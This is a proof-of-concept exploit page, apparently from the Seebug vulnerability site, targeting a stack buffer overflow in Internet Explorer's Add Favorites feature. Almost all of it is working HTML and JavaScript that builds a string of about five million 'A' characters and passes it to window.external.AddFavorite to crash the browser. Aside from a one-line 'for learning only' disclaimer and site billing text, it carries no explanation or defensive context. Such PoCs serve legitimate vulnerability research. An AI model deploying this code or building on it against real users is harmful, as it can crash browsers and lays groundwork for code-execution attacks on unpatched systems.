-------------------------------------------> IE Add Favourites Stack Buffer Overflow POC Sberry, Compaq -------------------------------------------> <html> <head> <script language="JavaScript" type="Text/Javascript"> function go() { var str =unescape('%u4141'); var finalstr = createInlineBuffer(str, 5150000); var len = finalstr.length; document.write(len); addfav(finalstr); } /* Effient in-line creation */ function createInlineBuffer (str, num) { var i = Math.ceil(Math.log(num) / Math.LN2), res = str; do { res += res; } while (0 < --i); return res.slice(0, str.length * num); } /* Vulnerable Function */ function addfav(str) { if (document.all) { window.external.AddFavorite ('http://'+str,'Crash') } } </script> </head> <body> <a href="javascript:go()">Add To Favorites</a> </body> </html>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论